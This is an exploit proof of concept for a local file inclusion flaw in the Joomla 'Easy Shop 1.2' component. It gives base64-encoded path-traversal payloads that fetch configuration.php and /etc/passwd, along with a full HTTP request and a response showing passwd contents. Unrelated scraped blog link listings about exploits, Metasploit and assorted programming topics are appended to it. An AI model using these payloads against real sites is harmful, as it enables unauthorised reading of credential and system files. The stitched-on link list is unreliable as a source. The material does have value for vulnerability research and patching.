# Exploit Title: Joomla! Component Easy Shop 1.2. - Local File Inclusion

# Dork: N/A

# Date: --

# Exploit Author: Ihsan Sencan

# Vendor Homepage: https://joomtech.net/

# Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7bafaa65995fb3b1383328105df1e10f

# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/shopping-cart/easy-shop/

# Version: 1.2.

# Category: Webapps

# Tested on: WiN7_x64/KaLiLinuX_x64

# CVE: N/A

# POC:

# )

# http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]

# 

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1

Host: TARGET

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/ Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Cookie: __cfduid=d11dd4447c0b8ef3cd8c4f6745ebdf50e1548111108; 6eecafb7a7a944789bd299deac1ff945=osde04ob1pgq9o3p8arfqtbobk

DNT: 1

Connection: keep-alive

Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK

Date: Mon, 21 Jan 2019 23:58:02 GMT

Content-Type: text/plain;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Expect-CT: max-age=604800, report-uri="http://localhost/[PATH]/"

Server: cloudflare

CF-RAY: 49cd621bce8f537e-LAX

Content-Encoding: br

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

....

[EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion的更多相关文章

  1. [EXP]McAfee ePO 5.9.1 - Registered Executable Local Access Bypass

    # Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass # Date: 2019-03-07 # Exp ...

  2. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  3. The Honeynet ProjectThe Honeynet Project

    catalogue . 蜜罐基本概念 . Kippo: SSH低交互蜜罐安装.使用 . Dionaea: 低交互式蜜罐框架部署 . Thug . Amun malware honeypots . Gl ...

  4. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  5. 应用安全 - CMS - vBulletin漏洞汇总

    SSV-15384 Date: 2004.11 漏洞类别: SQL 注入 SSV-15476 Date: 2005.2 漏洞类别: RCE SSV-15482 Date: 2005.2 类型: RCE ...

  6. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

  7. Metasploit辅助模块

    msf > show auxiliary Auxiliary ========= Name                                                  Di ...

  8. python安全编程

    ##入门 这将是第一个一系列关于python编程的博客文章.python是一门非常强大的语言,因为它有信息安全社区的支撑.这意味着很多工具都是由python编写并且可以在脚本中调用很多模块.使用模块的 ...

  9. ha-wordy-Write-up

    信息收集 下载地址:点我 bilibili:点我 ➜ ~ nmap -sn 192.168.116.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 20 ...

随机推荐

  1. 安全运维之:Linux后门入侵检测工具的使用

    安全运维之:Linux后门入侵检测工具的使用 https://blog.csdn.net/exitgogo/article/details/39547113

  2. VMware12上安装CentOS7无法上网问题

    常安装使用VMware的搭建集群环境,VMare安装后虚拟机默认的是自动获取IP,有时候用的过程中突然XSHELL中断或者需要固定IP上网,遇到几次居然,但忘了步骤,总结一下,省的每次去找资料 环境配 ...

  3. 初学c# -- 纯属无聊,写下棋

    纯属无聊了,会下的棋都做了. 象棋围棋修改用法都一样. 1.先启动服务端 goServer.exe服务端:地址为IPAddress[] addrIP = Dns.GetHostAddresses(&q ...

  4. Polynomial regression

  5. 导出word文档 通过DocX组件

    根据DocX官方描述如下: In the application development process, it uses COM libraries and requires MS Word or ...

  6. 算法练习LeetCode初级算法之数组

    删除数组中的重复项 官方解答: 旋转数组 存在重复元素 只出现一次的数     官方解答:  同一个字符进行两次异或运算就会回到原来的值 两个数组的交集 II import java.util.Arr ...

  7. 100-days: twelve

    Title:   Mark Zuckerberg wants Facebook's to emulate China's WeChat, but can it? emulate v.效仿,模仿 As ...

  8. [leetcode]84. Largest Rectangle in Histogram直方图中的最大矩形

    Given n non-negative integers representing the histogram's bar height where the width of each bar is ...

  9. [leetcode]12. Integer to Roman整数转罗马数字

    Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M. Symbol Value I 1 ...

  10. hugepage优势

    hugepage的优势与使用 +2投票   优势 通过使用hugepage分配可以提高性能,因为需要更少的页,因此需要更少Translation Lookaside Buffers (TLB,高速传送 ...